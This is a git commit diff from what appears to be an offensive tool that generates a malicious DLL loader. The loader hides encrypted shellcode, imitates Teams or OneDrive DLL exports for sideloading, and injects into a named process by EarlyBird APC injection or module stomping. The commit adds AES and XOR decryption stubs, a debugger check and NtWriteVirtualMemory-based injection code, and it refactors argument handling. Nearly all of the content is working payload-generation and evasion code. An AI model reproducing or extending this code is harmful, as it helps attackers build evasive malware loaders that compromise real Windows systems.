refactored AES made changes to controller
This commit is contained in:
georgesotiriadis
2023-07-02 21:49:29 +03:00
parent 754b4e8e82
commit a13cc9daa7
7 changed files with 87 additions and 20 deletions
+7 -8
View File
@@ -1,16 +1,15 @@
#pip install crypto, pycryptodome
import sys
from Crypto.Cipher import AES
from Cryptodome.Cipher import AES
from secrets import token_bytes
from binascii import unhexlify
import hashlib
import random
import hashlib
#keyAES = token_bytes(16)
key = ''.join([chr(random.randint(0, 255)) for i in range(16)])
keyAES = ''.join(['\\x' + hex(ord(x))[2:].zfill(2) for x in key])
key = token_bytes(16)
keyAES = ''.join([f"\\x{byte:02x}" for byte in key])
def encryptAES(plaintext,keyAES):
def encryptAES(plaintext, keyAES):
def pad(s):
padding_length = AES.block_size - len(s) % AES.block_size
@@ -18,7 +17,7 @@ def encryptAES(plaintext,keyAES):
return s + padding
def aesenc(plaintext, keyAES):
k = hashlib.sha256(keyAES).digest()
k = hashlib.sha256(keyAES.encode()).digest()
iv = bytes(16)
cipher = AES.new(k, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext))
@@ -26,4 +25,4 @@ def encryptAES(plaintext,keyAES):
ciphertext = aesenc(plaintext, keyAES)
return str(ciphertext)
return str(ciphertext)
+13
View File
@@ -0,0 +1,13 @@
def Choose_Decryption(encryption_type,xor_func,shellcode_var,key_var):
xor_dec=f"""
{xor_func}({shellcode_var}, sizeof({shellcode_var}), {key_var}, sizeof({key_var}));
"""
aes_dec=f"""
AESDecrypt((char *) {shellcode_var}, sizeof({shellcode_var}), (char *) {key_var}, sizeof({key_var}));
"""
if encryption_type == "AES":
return aes_dec
else:
return xor_dec
+51
View File
@@ -0,0 +1,51 @@
def ChosenEncryption(encryption_type,xor_func):
aes = f"""
int AESDec(char* size, unsigned int size_len, char* encryptionKey, size_t keySize) {{
HCRYPTPROV hHash;
HCRYPTHASH hHaHash;
HCRYPTKEY hencryptionKey;
if (!CryptAcquireContextW(&hHash, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {{
return -1;
}}
if (!CryptCreateHash(hHash, CALG_SHA_256, 0, 0, &hHaHash)) {{
return -1;
}}
if (!CryptHashData(hHaHash, (BYTE*)encryptionKey, (DWORD)keySize, 0)) {{
return -1;
}}
if (!CryptDeriveKey(hHash, CALG_AES_256, hHaHash, 0, &hencryptionKey)) {{
return -1;
}}
if (!CryptDecrypt(hencryptionKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)size, (DWORD*)&size_len)) {{
return -1;
}}
CryptReleaseContext(hHash, 0);
CryptDestroyHash(hHaHash);
CryptDestroyKey(hencryptionKey);
return 0;
}}
"""
xor=f"""
void {xor_func}(unsigned char* data, size_t data_len, char* key, size_t key_len)
{{
int j;
j = 0;
for (int i = 0; i < data_len; i++)
{{
if (j == key_len - 1) j = 0;
data[i] = data[i] ^ key[j];
j++;
}}
}};
"""
if encryption_type == "AES":
return aes
else:
return xor
+6 -2
View File
@@ -1,4 +1,5 @@
def EarlyBird(shellcode_var,ciphertext_split,process_to_inject,time,xor_func,key_var,key_hex):
from Encryption.Choose_Decryption import Choose_Decryption
def EarlyBird(shellcode_var,ciphertext_split,process_to_inject,time,xor_func,key_var,key_hex,encryption_type):
EarlyBird_Injection=f"""
unsigned char {shellcode_var}[] = {ciphertext_split}
@@ -47,7 +48,10 @@ def EarlyBird(shellcode_var,ciphertext_split,process_to_inject,time,xor_func,key
CheckRemoteDebuggerPresent(GetCurrentProcess(), &bIsDbgPresent);
// Allocate Virtual Memory
NtAllocateVirtualMemory(victimProcess, &allocation_start, 0, (PULONG64)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
{xor_func}({shellcode_var}, sizeof({shellcode_var}), {key_var}, sizeof({key_var}));
{Choose_Decryption(encryption_type,xor_func,shellcode_var,key_var)}
// Copy shellcode into allocated memory
NtWriteVirtualMemory(victimProcess, allocation_start, {shellcode_var}, sizeof({shellcode_var}), 0);
NtProtectVirtualMemory(victimProcess, &allocation_start, (PSIZE_T)&allocation_size, PAGE_EXECUTE_READ, &oldProtect);
+2 -2
View File
@@ -13,9 +13,9 @@ def parse_arguments():
parser.add_argument("--pname", "-n", help="Name of process to inject shellcode into",
type=str,metavar='',required=True)
parser.add_argument("--dexports", "-d", help="Specify which DLL Exports you want to use either teams or onedrive",
type=str,metavar='',choices=['teams', 'onedrive'],required=True)
type=str,nargs=1,metavar='',choices=['teams', 'onedrive'],required=True)
parser.add_argument("--enc", "-e", help="Specify which encryption you prefer (XOR / AES)",
type=str,metavar='',choices=['XOR', 'AES'],required=True)
type=str,nargs=1,metavar='',choices=['XOR', 'AES'],required=True)
parser.add_argument("--inj", "-i", help="Specify which injection technique you prefer (EB / MS)",
type=str,metavar='',choices=['EB', 'MS'],required=True)
parser.add_argument("--rshell", "-s", help="[Optional] Replace shellcode variable name with a unique name",
+2 -2
View File
@@ -1,6 +1,6 @@
from Injection.EarlyBird_Injection import EarlyBird
from Injection.Module_Stomping import ModuleStomping
from Encryption.chosen_encryption import ChosenEncryption
from Encryption.Choose_Encryption import ChosenEncryption
# here we specify the DLL skeleton
def template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,key_hex,process_to_inject,time,injection,encryption_type):
@@ -91,7 +91,7 @@ def template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,key_h
DWORD WINAPI DoMagic(LPVOID lpParameter)
{{
{
EarlyBird(shellcode_var, ciphertext_split, process_to_inject, time, xor_func, key_var, key_hex)
EarlyBird(shellcode_var, ciphertext_split, process_to_inject, time, xor_func, key_var, key_hex,encryption_type)
if injection == "EB" else ModuleStomping() if injection == "MS" else ""
}
+6 -6
View File
@@ -2,7 +2,7 @@ import random
import os
from Dll_Names.Dlls import dll_names
from Encryption.Xor import DoXor,key,key_hex
from Encryption.XOR import DoXor,key,key_hex
from Templates.Split_Xor_Shellcode import split_xor_shellcode
from Templates.C_Template import template
from Templates.Arguments import parse_arguments
@@ -20,7 +20,7 @@ def Controller():
args = parse_arguments()
try:
plaintext = open(args.raw[0],"rb").read()
output_folder = args.path[0]
output_folder = args.path
process_to_inject = args.pname
file_alias = args.dexports[0]
if file_alias not in array_dll_names:
@@ -28,10 +28,10 @@ def Controller():
sys.exit(1)
file_option = array_dll_names[file_alias]
encryption_type = args.enc[0]
injection = args.inj[0]
shellcode_var =args.rshell[0]
xor_func = args.rxor[0]
key_var = args.rkey[0]
injection = args.inj
shellcode_var =args.rshell
xor_func = args.rxor
key_var = args.rkey
time = args.rsleep
except:
parse_arguments()